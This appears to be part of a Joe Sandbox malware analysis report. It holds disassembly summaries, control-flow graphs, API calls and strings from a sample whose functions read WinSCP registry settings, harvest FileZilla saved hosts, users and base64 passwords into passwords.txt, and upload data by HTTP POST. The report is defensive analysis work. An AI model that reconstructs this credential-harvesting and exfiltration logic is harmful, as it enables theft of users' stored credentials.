                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D811
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000), ref: 0040D883
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0042150A,00000000), ref: 0040D9A7
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040D9DD
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040D9FA
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040DA10
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040DA26
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040DA55
                                                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,00000004), ref: 0040DA7F
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040DA9C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Security, xrefs: 0040DA77
                                                                                                                                                                                                                                                                                                  • Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040DA4B
                                                                                                                                                                                                                                                                                                  • UseMasterPassword, xrefs: 0040DA72
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$Process$Free$??3@Allocstrcpy_s$lstrlen$memset$strlen$_invalid_parameter_noinfo_noreturnstrchr$CloseOpenValue
                                                                                                                                                                                                                                                                                                  • String ID: Security$Software\Martin Prikryl\WinSCP 2\Configuration$UseMasterPassword
                                                                                                                                                                                                                                                                                                  • API String ID: 1968195974-1988659312
                                                                                                                                                                                                                                                                                                  • Opcode ID: 70b48f79dde87d68d958232ae859ffb282ceefb322202551e63ed2134ea11841
                                                                                                                                                                                                                                                                                                  • Instruction ID: 45027c83fb9c17c7e498a7fe32e666c7a7efeb05010239fc81dc07cf04dd4ddd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70b48f79dde87d68d958232ae859ffb282ceefb322202551e63ed2134ea11841
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A342C9B19043005BD710ABA5CD49B6FBBE9EF85314F04082EF986A72D1D778DC49CB9A
                                                                                                                                                                                                                                                                                                  Function 0040DE80 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 430stringmemoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1386 40de80-40df0b call 4101c0 call 411550 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410200 call 4076b0 1409 40df11-40df1e call 4115b0 1386->1409 1410 40e064-40e095 call 410230 * 5 1386->1410 1409->1410 1415 40df24-40df86 strtok_s call 4101c0 * 4 GetProcessHeap HeapAlloc 1409->1415 1432 40e0b9-40e0c7 StrStrA 1415->1432 1433 40df8c-40e05f lstrlenA call 4101c0 call 410200 * 4 call 413e50 call 410230 call 4104e0 * 4 call 410230 * 4 1415->1433 1434 40e0f0-40e0fe StrStrA 1432->1434 1435 40e0c9-40e0eb lstrlenA call 411e60 call 410290 call 410230 1432->1435 1433->1410 1438 40e100-40e122 lstrlenA call 411e60 call 410290 call 410230 1434->1438 1439 40e127-40e135 StrStrA 1434->1439 1435->1434 1438->1439 1441 40e137-40e159 lstrlenA call 411e60 call 410290 call 410230 1439->1441 1442 40e15e-40e16c StrStrA 1439->1442 1441->1442 1450 40e172-40e1dc lstrlenA call 411e60 call 410290 call 410230 call 410530 lstrlenA LocalAlloc 1442->1450 1451 40e2df-40e2f3 call 410530 lstrlenA 1442->1451 1450->1451 1486 40e1e2-40e1e7 1450->1486 1464 40e0a0-40e0b3 strtok_s 1451->1464 1465 40e2f9-40e30d call 410530 lstrlenA 1451->1465 1464->1432 1464->1433 1465->1464 1478 40e313-40e327 call 410530 lstrlenA 1465->1478 1478->1464 1487 40e32d-40e341 call 410530 lstrlenA 1478->1487 1489 40e2b0-40e2dc call 410240 call 410340 call 410290 call 410230 1486->1489 1490 40e1ed-40e200 1486->1490 1487->1464 1499 40e347-40e436 lstrcatA * 2 call 410530 lstrcatA * 2 call 410530 lstrcatA * 3 call 410530 lstrcatA * 3 call 410530 lstrcatA * 3 call 410240 * 4 1487->1499 1489->1451 1494 40e234-40e23b 1490->1494 1498 40e240-40e244 1494->1498 1502 40e270-40e273 1498->1502 1503 40e246-40e24a 1498->1503 1499->1464 1506 40e291-40e299 1502->1506 1508 40e280-40e283 1503->1508 1509 40e24c-40e250 1503->1509 1512 40e210-40e224 1506->1512 1513 40e29f-40e2a2 1506->1513 1508->1506 1515 40e290 1509->1515 1516 40e252-40e255 1509->1516 1520 40e22a-40e22e 1512->1520 1513->1520 1515->1506 1516->1506 1522 40e257-40e25d 1516->1522 1520->1489 1520->1494 1522->1498 1526 40e25f 1522->1526 1526->1520
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0040DF2D
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(0042150A,0042150A,0042150A,0042150A,?,00000028,0042150A), ref: 0040DF71
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,000F423F), ref: 0040DF7F
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040DF99
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E0BF
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E0CA
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E0F6
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E101
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E12D
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E138
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E164
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E173
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,00000000,0000001B,-000000DE), ref: 0040E1A5
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040E1D1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen$lstrcpy$AllocLocal$File$CreateHeaplstrcat$CloseFolderFreeHandleObjectPathProcessReadSingleSizeSleepThreadWaitstrtok_s
                                                                                                                                                                                                                                                                                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 146520747-935134978
                                                                                                                                                                                                                                                                                                  • Opcode ID: 253e312af40f5c8eab5cfd80d8c7ddec6c55d6e529187937948efa2f971f0c6d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0a1636bca5df7c154e2ca60be6e54f7e11655359c512dbb65eed7aa386b826a3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 253e312af40f5c8eab5cfd80d8c7ddec6c55d6e529187937948efa2f971f0c6d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22E1C731A00218ABCB14EBB1DC959EE7B79AF58304F40045EF50277192DF7CA9C6CBA9
                                                                                                                                                                                                                                                                                                  Function 00403090 Relevance: 72.4, APIs: 27, Strings: 14, Instructions: 682networkstringmemoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1548 403090-40317c call 4101c0 call 410200 call 402790 call 4116b0 call 410530 lstrlenA call 410530 call 4116b0 call 4101c0 * 4 StrCmpCA 1571 4031ab-403298 call 4113b0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 4102e0 call 410340 call 410290 call 410230 * 3 call 410340 call 4102e0 call 410290 call 410230 * 2 InternetConnectA 1548->1571 1572 40317e-4031a5 call 410530 InternetOpenA 1548->1572 1577 40386c-4038ae call 411250 * 2 call 4104e0 * 4 call 410200 1571->1577 1642 40329e-4032d5 HttpOpenRequestA 1571->1642 1572->1571 1572->1577 1607 4038c0-403913 call 410230 * 9 1577->1607 1644 403865-403866 InternetCloseHandle 1642->1644 1645 4032db-4032e6 1642->1645 1644->1577 1646 403300-403718 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 401390 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410530 lstrlenA call 410530 lstrlenA GetProcessHeap RtlAllocateHeap call 410530 * 2 lstrlenA memcpy call 410530 lstrlenA memcpy call 410530 lstrlenA call 410530 * 2 lstrlenA memcpy 1645->1646 1647 4032e8-4032fa InternetSetOptionA 1645->1647 1846 403720-403754 call 410530 lstrlenA call 410530 HttpSendRequestA 1646->1846 1647->1646 1851 403780-4037ac call 411250 HttpQueryInfoA 1846->1851 1852 403756-403769 Sleep 1846->1852 1859 4038b0-4038bd call 4101c0 1851->1859 1860 4037b2-4037bd call 411220 1851->1860 1853 403770-40377b call 411250 1852->1853 1854 40376b-40376e 1852->1854 1853->1859 1854->1846 1854->1853 1859->1607 1860->1859 1865 4037c3-4037de InternetReadFile 1860->1865 1866 4037e0-4037e5 1865->1866 1867 403834-40384c call 410530 StrCmpCA 1865->1867 1866->1867 1868 4037e7-4037ea 1866->1868 1873 403856-403862 InternetCloseHandle 1867->1873 1874 40384e-403850 ExitProcess 1867->1874 1870 4037f0-40382b call 410340 call 410290 call 410230 InternetReadFile 1868->1870 1870->1867 1880 40382d-403832 1870->1880 1873->1644 1880->1867 1880->1870
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116B0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,00403103,00000000,00000000,?,?,?), ref: 004116E9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116B0: GetProcessHeap.KERNEL32 ref: 004116FC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116B0: RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 00411706
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116B0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0041171D
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00403114
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116B0: GetLastError.KERNEL32 ref: 00411733
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116B0: GetProcessHeap.KERNEL32 ref: 00411741
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116B0: HeapFree.KERNEL32(00000000,00000000,?), ref: 0041174B
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,https,0042150A,0042150A,0042150A,0042150A,00000000,00000000,00000000,00000000), ref: 0040316F
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 0040319E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 00403290
                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 004032CA
                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 004032FA
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,",?,?,file_data,?,?,Content-Disposition: form-data; name=",?,?,00421505,?,?,?), ref: 0040364A
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00403660
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040366C
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00403679
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040369B
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00411952,00000000), ref: 004036A2
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00000014), ref: 004036BC
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,?,00000014), ref: 004036C7
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 004036E1
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00403703
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000014), ref: 00403708
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00403739
                                                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040374F
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 0040375D
                                                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(?,00000013,?,00000100,00000000), ref: 004037A4
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 004037D6
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000007CF,?), ref: 00403823
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,block,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 00403848
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403850
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00403859
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00403866
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
